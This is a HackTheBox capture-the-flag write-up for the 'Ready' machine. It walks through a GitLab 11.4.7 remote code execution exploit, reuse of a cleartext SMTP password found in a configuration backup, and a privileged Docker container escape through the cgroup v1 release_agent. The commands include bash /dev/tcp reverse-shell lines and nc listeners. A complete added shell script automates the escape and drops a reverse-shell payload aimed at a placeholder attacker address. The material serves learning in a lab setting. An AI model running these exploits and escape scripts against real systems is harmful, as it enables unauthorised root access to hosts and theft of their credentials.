HackTheBox - Ready write up
Ready is a Medium Linux box.


As always, let's start with an nmap scan.

$ nmap -A -p- -oN scan.nmap

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in · GitLab
|_Requested resource was
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, two ports are open: 22 for SSH and 5080 for a GitLab instance served by nginx.


I register a user to find the version of GitLab, which is shown on the /help page once logged in.

Gitlab CE v11.4.7


This version is vulnerable to an authenticated remote code execution chain: an SSRF in the project import URL (CVE-2018-19571) combined with CRLF injection into the Redis connection (CVE-2018-19585), which lets an attacker queue a Sidekiq job that runs arbitrary commands as the git user. Any registered account is enough, which is why the exploit creates its own throwaway user. I use this exploit from GitHub:

$ python3 gitlab_rce.py
Gitlab Exploit by dotPY [insert fancy ascii art]
registering z5WS1NhskU:Gf7QvhGTUl - 200
Getting version of - 200
The Version seems to be 11.4.7! Choose wisely
delete user z5WS1NhskU - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 0
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering TxA6x9UnTK:mHVy6vTFkK - 200
hacking in progress - 200
delete user TxA6x9UnTK - 200
$ nc -lvnp 42069
Connection from
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ id
uid=998(git) gid=998(git) groups=998(git)

We have a shell as the git user, and user.txt is readable in /home/dude:

git@gitlab:/home/dude$ cat user.txt


We are inside a Docker container: /.dockerenv exists at the root of the filesystem, and systemd-detect-virt confirms it.

$ ls -al /
total 108
drwxr-xr-x   1 root root 4096 Dec 24 18:30 .
drwxr-xr-x   1 root root 4096 Dec 24 18:30 ..
-rwxr-xr-x   1 root root    0 Dec  1 12:41 .dockerenv
git@gitlab:/tmp$ systemd-detect-virt

After some enumeration, we find cleartext passwords in a backup of the GitLab configuration, world-readable under /opt/backup:

$ find / -name backup 2>/dev/null

$ ls -al /opt/backup
total 112
drwxr-xr-x 2 root root  4096 Dec  7 09:25 .
drwxr-xr-x 1 root root  4096 Dec  1 16:23 ..
-rw-r--r-- 1 root root   872 Dec  7 09:25 docker-compose.yml
-rw-r--r-- 1 root root 15092 Dec  1 16:23 gitlab-secrets.json
-rw-r--r-- 1 root root 79639 Dec  1 19:20 gitlab.rb

git@gitlab:/opt/backup$ grep password gitlab.rb
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

The SMTP password turns out to be reused for the root account inside the container. su needs a tty, so spawn one first:

git@gitlab:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:/tmp$ su root
Password: wW59U!ZKMbG9+*#h


We are now root, but only inside the container, not on the real host. We need to escape the container. The docker-compose.yml in the backup tells us how the container was started:

root@gitlab:/opt/backup$ cat docker-compose.yml
version: '2.4'

    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    privileged: true

As you can see, the GitLab container is running in privileged mode. That disables Docker's default capability drop, seccomp filter and AppArmor profile and exposes the host's devices, so the container effectively has every Linux capability. The one we need is CAP_SYS_ADMIN, which allows mount(2) inside the container. Nothing in the GitLab image requires privileged: true; it is a configuration mistake, and it lets us escape the container and run commands on the host as root.

Thanks to this article, I found two ways to escape a container running in privileged mode; the one used here abuses the cgroup v1 release_agent. When the last process leaves a cgroup whose notify_on_release flag is set, the kernel runs the hierarchy's release_agent binary as root in the host's namespaces. The agent path is resolved on the host, so the sed below reads the overlay upperdir of the container's root filesystem from /etc/mtab: a file written to / inside the container appears under that directory on the host. The rdma controller is used simply because it is not already mounted. This requires cgroup v1 on the host; a cgroup v2-only hierarchy has no release_agent and the mount step fails.

root@gitlab:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x   
root@gitlab:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@gitlab:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
root@gitlab:/# echo '#!/bin/bash' > /cmd
root@gitlab:/# echo "bash -i >& /dev/tcp/ 0>&1" >> /cmd
root@gitlab:/# cat /cmd
bash -i >& /dev/tcp/ 0>&1
root@gitlab:/# chmod a+x /cmd
root@gitlab:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
$ nc -lvnp 4444
Connection from
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ready:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:/# cat /root/root.txt
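The escape above is a string of one-liners with no checks. Below is an added example, written for this write-up and not taken from the box, the exploit author or the linked article, that wraps the same technique in a script with the pre-flight checks a practitioner wants before trying it: it covers both the "are we in a container, and is it privileged?" question from the enumeration section and the cgroup release_agent escape itself. It decodes the CapEff mask from /proc/self/status to confirm CAP_SYS_ADMIN, extracts the overlay upperdir from the mount table, and only then mounts the rdma cgroup hierarchy and triggers the release_agent. LHOST and LPORT are placeholders (an assumption, not the box's values), the SAMPLE_MTAB_LINE is constructed sample data, and the script assumes an overlay2-backed container on a cgroup v1 host, as on this box. Run it with --check to see the indicators and with --run to perform the escape.

```bash
#!/bin/sh
# Added example for this write-up; not code from the box, the exploit or
# the linked article. Pre-flight checks plus the cgroup v1 release_agent
# escape, wired to a reverse shell. LHOST/LPORT are placeholders (assumption).

LHOST="${LHOST:-10.10.14.1}"     # attacker address: hypothetical value
LPORT="${LPORT:-4444}"

# Constructed mount-table line of the kind found in /etc/mtab inside an
# overlay2-backed container (sample data, not taken from the box).
SAMPLE_MTAB_LINE='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/XYZ:/var/lib/docker/overlay2/l/ABC,upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work 0 0'

# has_cap MASK BIT: decode a CapEff hex mask as printed in /proc/self/status
# and report whether capability BIT is set. CAP_SYS_ADMIN is bit 21. A default
# Docker container shows CapEff 00000000a80425fb, where that bit is clear;
# --privileged shows a mask with every capability bit set.
has_cap() {
    mask=$1
    bit=$2
    [ -n "$mask" ] || { echo no; return 0; }
    val=$(( 0x$mask ))
    if [ $(( (val >> bit) & 1 )) -eq 1 ]; then echo yes; else echo no; fi
}

# parse_upperdir: read a mount table on stdin and print the upperdir of the
# first overlay mount. That is the host-side directory holding the container's
# writable layer: a file written to / in the container is $upperdir/<name>
# on the host, which is why the release_agent path is built from it.
parse_upperdir() {
    sed -n 's/.*upperdir=\([^,[:space:]]*\).*/\1/p' | head -n 1
}

# in_container: quick indicators that we are inside Docker.
in_container() {
    if [ -f /.dockerenv ]; then
        echo yes
    elif grep -qE 'docker|containerd|kubepods' /proc/1/cgroup 2>/dev/null; then
        echo yes
    else
        echo no
    fi
}

# escape: mount the (unused) rdma cgroup v1 hierarchy, create a child cgroup
# with notify_on_release=1, point the hierarchy's release_agent at the payload
# via its host path, then add a short-lived process to the child cgroup. When
# that process exits the kernel runs the release_agent as root in the host's
# namespaces. Fails on cgroup v2-only hosts, which have no release_agent.
escape() {
    capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    [ "$(has_cap "$capeff" 21)" = yes ] || { echo "no CAP_SYS_ADMIN: container is not privileged" >&2; return 1; }
    host_path=$(parse_upperdir < /etc/mtab)
    [ -n "$host_path" ] || { echo "no overlay upperdir found in /etc/mtab" >&2; return 1; }

    mkdir -p /tmp/cgrp
    mount -t cgroup -o rdma cgroup /tmp/cgrp || { echo "cgroup v1 mount failed (cgroup v2 host?)" >&2; return 1; }
    mkdir -p /tmp/cgrp/x
    echo 1 > /tmp/cgrp/x/notify_on_release
    echo "$host_path/cmd" > /tmp/cgrp/release_agent

    # /cmd inside the container is $host_path/cmd on the host.
    printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$LHOST" "$LPORT" > /cmd
    chmod a+x /cmd

    # Trigger: this sh joins cgroup x and exits at once, emptying the cgroup.
    sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'
    echo "release_agent triggered; check the listener on $LHOST:$LPORT"
}

case "${1:-}" in
    --check)
        echo "in container:  $(in_container)"
        echo "CAP_SYS_ADMIN: $(has_cap "$(awk '/^CapEff:/ {print $2}' /proc/self/status)" 21)"
        echo "host upperdir: $(parse_upperdir < /etc/mtab)" ;;
    --run)
        escape ;;
esac
```

The CapEff check is the quickest way to tell whether a container is worth attacking this way: a stock Docker container prints 00000000a80425fb and the mount call would fail with EPERM, while a privileged one prints an all-ones mask. On a host that only mounts cgroup v2 the script stops at the mount step, and a different escape (for example, via the host's block devices, which privileged mode also exposes) is needed.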

Rooted!

